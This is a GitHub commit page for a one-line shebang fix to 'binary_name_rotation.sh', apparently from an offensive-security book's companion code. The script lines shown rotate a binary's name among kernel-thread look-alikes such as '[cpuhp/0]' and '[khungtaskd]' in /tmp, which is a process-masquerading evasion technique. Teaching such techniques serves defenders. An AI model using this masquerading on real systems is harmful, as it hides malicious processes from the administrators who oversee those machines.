Skip to content

Commit

Permalink
add pound
Browse files Browse the repository at this point in the history
  • Loading branch information
dolevf committed Dec 2, 2023
1 parent 76b1a28 commit 8162c1f
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion ch12/binary_name_rotation.sh
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
!/bin/bash
#!/bin/bash
WORK_DIR="/tmp"
RANDOM_BIN_NAMES=("[cpuhp/0]" "[khungtaskd]" "[blkcg_punt_biio]" "[ipv8_addrconf]" "[mlb]" "[kstrrp]" "[neetns]" "[rcu_gb]")
RANDOMIZE=$(( (RANDOM % 7) + 0))
Expand Down

0 comments on commit 8162c1f

Please sign in to comment.